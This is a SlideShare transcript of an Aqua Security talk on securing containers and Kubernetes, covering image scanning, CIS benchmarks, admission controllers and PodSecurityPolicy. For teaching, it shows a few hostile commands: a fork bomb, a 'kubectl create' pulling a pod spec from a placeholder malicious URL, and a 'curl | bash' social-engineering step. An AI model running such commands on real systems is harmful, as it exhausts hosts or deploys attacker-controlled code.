Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Continuous Security: From tins to containers - now what!


Published on

Information Security departments often view containers as challenging to manage (code moves too fast for risk analysis, thousands of containers with limited visibility or control). Government organizations such as NIST have come out with guidelines for Application Container Security, while serverless technologies such as Azure Container Instances or AWS Fargate create additional challenges regarding how security risks are managed.

Published in: Technology
  • Be the first to comment

Continuous Security: From tins to containers - now what!

  1. 1. Copyright @ 2018 Aqua Security Software Ltd. All Rights Reserved. Continuous Security: From tins to containers - now what! Benjy Portnoy, CISSP, CISA @AquaSecTeam
  2. 2. 2 Container LIFECYCLE Where to place security controls ?
  3. 3. 3
  4. 4. 4 Once upon a time Check In Code Package Application Provision Server Install OS Patches Harden Server Install Dependencies Install Application Vulnerability Scan
  5. 5. 5 Your early decisions matter. A lot. n Selection of operating system n Source of images n Package selection n Exposed ports n Image user context n Embedding sensitive data n Internal configuration
  6. 6. 6 Your Dockerfile matters. A lot. FROM jboss/base-jdk:8 ENV WILDFLY_VERSION 12.0.0.Final ENV WILDFLY_SHA1 b2039cc4979c7e50a0b6ee0e5153d13d537d492f ENV JBOSS_HOME /opt/jboss/wildfly USER root RUN cd $HOME && curl -O$WILDFLY_VERSION/wildfly-$WILDFLY_VERSION.tar.gz && sha1sum wildfly-$WILDFLY_VERSION.tar.gz | grep $WILDFLY_SHA1 && tar xf wildfly-$WILDFLY_VERSION.tar.gz && mv $HOME/wildfly-$WILDFLY_VERSION $JBOSS_HOME && rm wildfly-$WILDFLY_VERSION.tar.gz && chown -R jboss:0 ${JBOSS_HOME} && chmod -R g+rw ${JBOSS_HOME} ENV LAUNCH_JBOSS_IN_BACKGROUND true USER jboss EXPOSE 8080 CMD ["/opt/jboss/wildfly/bin/", "-b", ""]
  7. 7. 7 Config software Assess Risk Coding Static Analysis Compile package Deploy Get Base Image Application Security Before Containers After Containers Deploy Fix Risks Build Image Fix Risks Scan Server Provision Server Get Base Image Coding Static Analysis Deploy Build Image Fix Risks Coding Static Analysis
  8. 8. 8 Micro-Scanner n n Download and run the MicroScanner in your Dockerfile FROM debian:jessie-slim RUN apt-get update && apt-get -y install ca- certificates ADD RUN chmod +x microscanner ARG token RUN /microscanner ${token} && rm /microscanner
  9. 9. 9 { "name": "CVE-2016-7444", "description": "nThe gnutls_ocsp_resp_check_crt function in lib/x509/ocsp.c in GnuTLS before 3.4.15 and 3.5.x before 3.5.4 does not verify the serial length of an OCSP response, which might allow remote attackers to bypass an intended certificate validation mechanism via vectors involving trailing bytes left by gnutls_malloc.nA flaw was found in the way GnuTLS validated certificates using OCSP responses. This could falsely report a certificate as valid under certain circumstances.", "nvd_score": 5, "nvd_score_version": "CVSS v2", "nvd_vectors": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "nvd_severity": "medium", "nvd_url": "", "vendor_score": 4.3, "vendor_score_version": "CVSS v2", "vendor_vectors": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "vendor_severity": "low", "vendor_url": "", "publish_date": "2016-09-27", "modification_date": "2018-01-04", "fix_version": "3.3.26-9.el7", "solution": "Upgrade package gnutls to version 3.3.26-9.el7 or above." } Aqua MicroScanner output Backports and fix advice NVD data and score Maintainer data and score Impact statement
  10. 10. 10 DEMO
  11. 11. 11 Kubernetes
  12. 12. 12 Internet Facing - K8s Dashboard - Anonymous Auth
  13. 13. 13 Documented K8S Security Best Practices n Authentication n Authorization (RBAC) n Network Segmentation n PodSecurityPolicy n Encrypt Secrets n Audit Everything n Admission Controllers
  14. 14. 14 (Not) Secure By Default
  15. 15. 15
  16. 16. 16 Kube-Bench: CIS Benchmark Testing n An open-source project by Aqua that automates CIS Benchmark testing - grab it at
  17. 17. 17 What are the potential security risks? 1. Exfiltration of sensitive data 2. Elevate privileges inside Kubernetes to access all workloads 3. Potentially Gain root access to the Kubernetes worker nodes 4. Perform lateral network movement outside the cluster 5. Run compromised Pod: kubectl create -f http://Insert_Malicious_UR L_here/FakeApp.yaml 1 2 3 4 5
  18. 18. 18 Admission Controllers
  19. 19. 19 kube-apiserver.yaml
  20. 20. 20 LAYERD SECURITY APPROACH ■ AlwaysPullImages ■ DenyEscalatingExec ■ PodSecurityPolicy ■ ImagePolicyWebhook ■ NodeRestriction ■ PodNodeSelector ■ ResourceQuota
  21. 21. 21 AlwaysPullImages ■ Prevent other Pods reusing image and forces registry authentication ■ Useful in a multitenant cluster - images can only be used by those who have the credentials to pull them. ■ Without this, any pod from any user can use the image by knowing the image’s name (assuming the Pod is scheduled onto the right node), without any authorization check against the image.
  22. 22. 22 DenyEscalatingExec ■ Prevent privilege escalation (exec or attach) via pods running with ■ privileged: true, ■ Host IPC namespace ■ Host PID namespace . ■ If your cluster supports containers that run with escalated privileges, restrict the ability of end-users to exec commands in those containers, using this admission controller.
  23. 23. 23 PodSecurityPolicy ■ Will not be enforced without Admission Controller ■ Privileged containers ■ Root namespaces ■ Volume types ■ Read only root file system ■ UID, GID of the container ■ SELinux/AppArmor context ■ Seccomp/SELinux/Apparmour profile
  24. 24. 24 CVE-2017-1002101 ■ Allows containers using subpath volume mounts (including non-privileged pods) to access files/directories outside of the volume, including the host’s filesystem. ■ Vulnerable versions: ■ Kubernetes 1.3 – 1.9 ■ PodSecurityPolicy can disable hostPath volumes and prevent this attack
  25. 25. 25 NodeRestriction ■ Limits the Node and Pod objects a kubelet can modify ■ kubelets must use credentials in the system:nodes group, with a username in the form system:node:<nodeName> ■ Can prevent intra-pod data leakage i.e. exposed secrets, config maps etc
  26. 26. 26 :(){ :|:& };:
  27. 27. 27 Resource Quota ■ Prevent violations of the constraints enumerated in the ResourceQuota object in a Namespace cpu Total requested cpu usage memory Total requested memory usage pods Total number of active pods where phase is pending or active. services Total number of services replicationcontrollers Total number of replication controllers resourcequotas Total number of resource quotas secrets Total number of secrets persistentvolumeclaims Total number of persistent volume claims
  28. 28. 28 Image Policy Webhook ■ Allows a backend webhook to make admission decisions ■ Does the image contain: ■ Vulnerabilities ■ Malware ■ Embedded Secrets ■ Running as UID 0?
  29. 29. 29 Social Engineering - Not just phishing email
  30. 30. 30 Social Engineering -> SRE Victim curl | bash Kubectl create –f
  31. 31. 31 We live in strange times… App “Regular” host Thin host Thin host (No host) (No host) Monolithic app on VM Hybrid VM/container Hyper-V / Kata / gVisor App App App Containerized app on VM Docker/ ContainerD / CRI-O/ Windows AppAppApp Fargate / ACI Lambda / Azure Functions / Google Functions On-Demand CaaS FaaS App AppApp Fn Fn Fn Fn Fn Fn Fn Fn
  32. 32. 32 CaaS Architecture Before: Tenant-managed hosts After: Host abstracted by cloud provider ?
  33. 33. 33 DEMO
  34. 34. Thank You!